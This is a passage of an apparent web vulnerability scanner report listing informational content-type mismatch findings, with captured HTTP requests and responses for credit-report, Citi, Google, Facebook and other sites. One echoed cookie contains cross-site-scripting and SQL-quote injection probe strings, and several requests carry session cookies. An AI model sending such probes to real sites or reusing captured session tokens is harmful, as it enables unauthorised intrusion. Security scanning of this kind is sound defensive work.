Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000; OriginalReferrer=creditchecktotal.com; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Login+Default+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+ForgotLogin; LastVisitDate=4/24/2011 1:46:15 PM

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+Message?PageTypeID=Contact Us+Message?PageTypeID=8d0a919d42899a53d56096c1+Message?PageTypeID=Contact Us8d0a919dbf39ce027681377b+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Default+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Message?PageTypeID=Contact Us+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Default+Error+Default+Order1+Error+Default+Message?PageTypeID=Contact Us+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Login+Default+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+ForgotLogin+Order1+Login+ForgotLogin+Order1+Login+Message?PageTypeID=Contact Us+ForgotLogin+Order1+Login+Message?PageTypeID=Contact Us+ForgotLogin+Login+Order1+Message?PageTypeID=Contact Us+ForgotLogin+Login+Order1+ForgotLogin+Login+Order1+ForgotLogin+Order1+Login+Order1+ForgotLogin+Login+Order1+ForgotLogin+Login+Order1+Login+Order1+ForgotLogin+Default+Login+Order1+ForgotLogin+Default+Login+Order1+ForgotLogin+Order1+Login+ForgotLogin+Order1+Login+ForgotLogin+Order1+Login+Order1+ForgotLogin+Order1+Login+ForgotLogin+Order1+Login+Order1+ForgotLogin+Login+Order1+Login+ForgotLogin+Order1+Login+Order1+ForgotLogin+Login+Order1+ForgotLogin+Login+Order1+ForgotLogin+Login+Order1+ForgotLogin+Login+Order1+ForgotLogin+Order1+Login+ForgotLogin+Order1+Login+ForgotLogin+Order1+Login+ForgotLogin+Order1+ForgotLogin+Order1+Message?PageTypeID=Contact Us+Login+ForgotLogin+Order1+Login+ForgotLogin+Order1+Login+Default+ForgotLogin+Order1+Login+ForgotLogin+Order1+ForgotLogin+Order1+Login+ForgotLogin+Order1+Default+Order1+Default+Order1+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Login+Order1+ForgotLogin+Order1+Login+Order1+ForgotLogin+Order1+Default+Order1+Message?PageTypeID=Contact Us+Login+ForgotLogin+Order1+Default+Order1+Default+Order1+Message?PageTypeID=Contact Us+ForgotLogin+Message?PageTypeID=Contact Us+Order1+ForgotLogin+Login+Order1+Login+Default+Order1+ForgotLogin+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Login+Order1+Message?PageTypeID=Contact Us6d949%22%3e%3ca%3e0181b96d9e2+Default+ForgotLogin+Default+Order1+Default+Order1+ForgotLogin+Order1+Default+Order1+Default+Login+Default+Order1+Default+Login+Order1+Default+Order1+Default+Message?PageTypeID=Contact Usb03c3%22a%3d%22b%22f2254a239fe+Order1+Default+Order1+Default+Order1+Default+Order1+Default+Order1+Default+ForgotLogin+Default+Order1+Default+Login+Order1+Default+Message?PageTypeID=Contact Us1b0ee%22%20a%3db%20277bb0a3380+Default+Order1+Default+ForgotLogin+Login+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Order1+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+Message?PageTypeID=ffa911332d77d0a5+Order1+ForgotLogin+Default+Error+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+Login+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+Order1+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+Message?PageTypeID=Contact Usf2e64b7970344b30+ForgotLogin+Default+ForgotLogin+Default+Order1+Default+ForgotLogin+Order1+Default+ForgotLogin+Order1+ForgotLogin+Default+Login+ForgotLogin+Default+Order1+ForgotLogin+Order1+Default+Error+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Message?PageTypeID=Contact Us'+Default+Message?PageTypeID=Contact Us''+Default+ForgotLogin+Message?PageTypeID=Contact Us%27+Default+ForgotLogin+Message?PageTypeID=Contact Us%27%27+Login+Default+ForgotLogin+Default+ForgotLogin+Login+Default+Order1+ForgotLogin+Default+Order1+Default+ForgotLogin+Order1+Error+Order1+Default+ForgotLogin+Order1+Default+Order1+Error+ForgotLogin+Default+Order1+ForgotLogin+Default+Order1+ForgotLogin+Default+Order1+ForgotLogin+Default+ForgotLogin+Default+Order1+ForgotLogin+Default+Login+ForgotLogin+Login+Default+ForgotLogin+Login+Default+ForgotLogin+Login+ForgotLogin+Login+Default+ForgotLogin+Login+Default+ForgotLogin+Login+Default+ForgotLogin+Order1+Default+Login+Error+ForgotLogin+Default+Order1+Error+Order1+Default+Error+ForgotLogin+Order1+Error+Default+Order1+ForgotLogin+Error+Order1+Default+Error+ForgotLogin+Default+Order1+ForgotLogin+Error+Default+ForgotLogin+Order1+Error+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Order1+Default+Order1+ForgotLogin+Default+Order1+Default+ForgotLogin+Default+ForgotLogin+Order1+Default+Error+ForgotLogin+Default+Order1+Error+ForgotLogin+Message?PageTypeID=Contact Us+Default+ForgotLogin+Order1+Default+Error+ForgotLogin+Login+Default+ForgotLogin+Order1+Error+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Order1+Default+Order1+ForgotLogin+Order1+Default+Order1+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+Message?PageTypeID=Contact Us+Login+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+Order1+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Order1+Default+ForgotLogin+Login+Default+ForgotLogin+Default+ForgotLogin+Message?PageTypeID=Contact Us+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+Order1+ForgotLogin+Login+Default+ForgotLogin+Login+Default+ForgotLogin+Default+Message?PageTypeID=Contact Us+ForgotLogin+Default+Message?PageTypeID=Contact Us+ForgotLogin+Default+Message?PageTypeID=Contact Us+ForgotLogin+Message?PageTypeID=Contact Us+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Login+Default+ForgotLogin+Login+Default+ForgotLogin+Default+Login+ForgotLogin+Default+Login+ForgotLogin+Default+Login+Order1+Message?PageTypeID=Contact Us+ForgotLogin+Login+Default+Message?PageTypeID=Contact Us+ForgotLogin+Login+Default+Message?PageTypeID=Contact Us+ForgotLogin+Login+Default+Message?PageTypeID=Contact Us+ForgotLogin+Default+Message?PageTypeID=Contact Us+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Order1+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+Order1+Login+Default+Message?PageTypeID=Contact Us+Default+ForgotLogin+Order1+Default+ForgotLogin+Order1+Default+Order1+Login+Message?PageTypeID=Contact Us+ForgotLogin+Order1+Default+Order1+ForgotLogin+Order1+Default+ForgotLogin+Order1+Default+Order1+Default+Order1+ForgotLogin+Login+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Order1+Default+ForgotLogin+Order1+Default+ForgotLogin+Default+ForgotLogin+Order1+Default+ForgotLogin+Order1+Default+ForgotLogin+Default+Order1+ForgotLogin+Default+Order1+Default+Order1+Default+Message?PageTypeID=Contact Us+Order1+Login+Order1+Login+Order1+ForgotLogin+Order1+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Default+ForgotLogin+Order1+Message?PageTypeID=Contact Us+Default+ForgotLogin+Message?PageTypeID=Contact Us+Default+ForgotLogin+Message?PageTypeID=Contact Us+Default+ForgotLogin+Message?PageTypeID=Contact Us+Default+ForgotLogin+Login+Default+ForgotLogin+Login+Default+Login+ForgotLogin+Default+Login+ForgotLogin+Default+Login+Default+Login+ForgotLogin+Default+Login+Default+ForgotLogin+Login+Default+Login+Default+Login+Default+Login+Default+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Login+Order1+Login+Message?PageTypeID=Contact Us+Order1+Login+Message?PageTypeID=Contact Us+Order1+Login+Order1+Login+Order1+Login+Message?PageTypeID=Contact Us+Login+Order1+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Login+Message?PageTypeID=Contact Us+Order1+Message?PageTypeID=Contact Us+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Order1+Login+Message?PageTypeID=SessionTimeOut+Login+Message?PageTypeID=SessionTimeOut; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 2:07:01 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 21:07:01 GMT
Content-Length: 2643
ETag: "pvaaae395a1a39f6762e6d1087e97561d1"
Content-Encoding: gzip
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UD1BD9B5].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

Order1+Default+ForgotLogin+Order1+Default+ForgotLogin+Default+ForgotLogin+Order1+Default+ForgotLogin+Order1+Default+ForgotLogin+Default+Order1+ForgotLogin+Default+Order1+Default+Order1+Default+Message
...[SNIP]...

33.67. http://www.dictof.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dictof.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FC101987E2340D1CA7E9F5BBE7019BA1.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; CAMPAIGNE.ENTRY_DATE_COOKIE=1303648014948; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=121015709.328301938.1303648022.1303648022.1303648022.1; __utmc=121015709; __utmb=121015709.1.10.1303648022; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=262432266.188043035.1303648022.1303648022.1303648022.1; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.2.10.1303648022

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:41:22 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Mon, 13 Jul 2009 16:24:11 GMT
ETag: "b466-46e98c08700c0"
Content-Length: 46182

..............(V..F......... .(V..nV........ .h...............h........PNG
.
...IHDR.............\r.f....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..U.IDATx^.}..$U...~...D
...[SNIP]...

33.68. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=0235066d8a4432981843fd205ce15e37&extern=0&channel=http%3A%2F%2Fwww.infusionblog.com%2F%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.38.127
X-Cnection: close
Date: Mon, 25 Apr 2011 01:39:44 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

33.69. http://www.freecreditreport.com/images/loan_center_nav_08.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freecreditreport.com
Path:   /images/loan_center_nav_08.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/loan_center_nav_08.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com
Cookie: s_vi=[CS]v1|26DA62F6851D24BE-40000107004A33F4[CE]

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: image/gif
Last-Modified: Mon, 03 Apr 2006 22:29:35 GMT
ETag: "pve77449145a7428f5d936b5b0043205a5"
Expires: Sun, 17 Apr 2011 21:40:22 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S11101.C76613.A70550.RA0.G11456.UECBB861].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 00:53:32 GMT
Age: 3214
Content-Length: 4267

......JFIF.....d.d......Ducky.......d.....&Adobe.d...........
...[..
\................................................................................................................................
...[SNIP]...

33.70. http://www.gfk.com/PHP_Includes/webtv.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gfk.com
Path:   /PHP_Includes/webtv.php

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain XML.

Request

GET /PHP_Includes/webtv.php?/media/flashcomm&action=mediaview&context=normal&id=736 HTTP/1.1
Host: www.gfk.com
Proxy-Connection: keep-alive
Referer: http://www.gfk.com/imperia/md/content/flash/vimp.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:36:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding,User-Agent
WS: lxws1
Content-Type: text/javascript; charset=utf-8
Content-Length: 64

<?xml version="1.0" encoding="UTF-8"?>
<mediainfo version="2"/>

33.71. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=reputation+monitoring HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=I-kkntLExM1TTzSWRyCwKeEK8o5z0wImIqRngsTZ1f7pPvcoVlw_RvPfaxCnExmyYdaAF09G-fMazzXzLodN-Utpj4hqQcsHLazgtjUOhze8vEcdwKcppf0Keaf3xqTz

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:42 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 38449

f94-wCe9....S....o...(..B..........7..e<!doctype html> <head> <title>reputation monitoring - Google Search</title> <script>window.google={kEI:"KsG0Td2XE4eTtwfYmo3qDg",kEXPI:"17259,24472,25907,271
...[SNIP]...

33.72. http://www.identitymonitor.citi.com/img/IMN00564/ad3.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.identitymonitor.citi.com
Path:   /img/IMN00564/ad3.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /img/IMN00564/ad3.gif HTTP/1.1
Host: www.identitymonitor.citi.com
Proxy-Connection: keep-alive
Referer: http://www.identitymonitor.citi.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=abe30ny0rbcvcwn3fxnsiifj

Response

HTTP/1.1 200 OK
Content-Length: 101174
Content-Type: image/gif
Last-Modified: Thu, 12 Apr 2007 18:34:42 GMT
Accept-Ranges: bytes
ETag: "0d303c317dc71:24ca"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:44:14 GMT

BM6.......6...(.........................................................................................................................................................................................
...[SNIP]...

33.73. http://www.identitymonitor.citi.com/img/IMN00564/bnr1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.identitymonitor.citi.com
Path:   /img/IMN00564/bnr1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /img/IMN00564/bnr1.jpg HTTP/1.1
Host: www.identitymonitor.citi.com
Proxy-Connection: keep-alive
Referer: http://www.identitymonitor.citi.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=abe30ny0rbcvcwn3fxnsiifj

Response

HTTP/1.1 200 OK
Content-Length: 2734
Content-Type: image/jpeg
Last-Modified: Mon, 16 Jun 2008 20:17:20 GMT
Accept-Ranges: bytes
ETag: "088aefaedcfc81:24ca"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:44:13 GMT

GIF89a..~.......,Ax7L.3IF\.Rh./D{Mc.Pf.J`.;Q.?T.CY.(=u...r..............[q.......cw...._t..........j~.............k~.......y.....v..Uk.......(>u...Tj..................................................
...[SNIP]...

33.74. http://www.iis.net/resources/third-party/omniture/analyticsid.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.iis.net
Path:   /resources/third-party/omniture/analyticsid.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /resources/third-party/omniture/analyticsid.aspx HTTP/1.1
Host: www.iis.net
Proxy-Connection: keep-alive
Referer: http://www.iis.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CSAnonymous=qiQvI5sCzAEkAAAAYmU0YTE1NTQtYjU0MC00NmM4LWIzNTgtYmI4NmU0OTdhYTI20

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:43 GMT
Content-Length: 67

<!--
gAnalyticsId="20b6f995-5c7e-4c63-85a1-24e39f56e0d5";
// -->

33.75. http://www.lijit.com/wijit  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lijit.com
Path:   /wijit

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /wijit?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Finfusionsoft&js=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:21 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n33 ( iad-agg-n30), rf-ms iad-agg-n30 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: max-age=600
Expires: Mon, 25 Apr 2011 01:49:22 GMT
Age: 0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 4287

document.write('<div id="100ff408ec614d23eb722ea09d594f37"> <div id="lwp_main" style="width:200px;" > <div id="lwp_rw" class="100ff408ec614d23eb722ea09d594f37"></div> <form action="http://www.lijit.co
...[SNIP]...

33.76. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/internet_fax_sb.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /images/blog_sidebar/internet_fax_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:09:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
Last-Modified: Tue, 11 Jan 2011 18:34:54 GMT
ETag: "e34a5e-2400-499965733cf80"
Accept-Ranges: bytes
Content-Length: 9216
Cache-Control: max-age=2903040, public
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................k....
...[SNIP]...

33.77. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /images/blog_sidebar/online_dating_sb.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /images/blog_sidebar/online_dating_sb.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:09:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
Last-Modified: Tue, 11 Jan 2011 18:34:54 GMT
ETag: "e34a62-2600-499965733cf80"
Accept-Ranges: bytes
Content-Length: 9728
Cache-Control: max-age=2903040, public
Content-Type: image/jpeg

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................k....
...[SNIP]...

33.78. http://www.nextadvisor.com/images/phonepowerlogo.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /images/phonepowerlogo.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/phonepowerlogo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
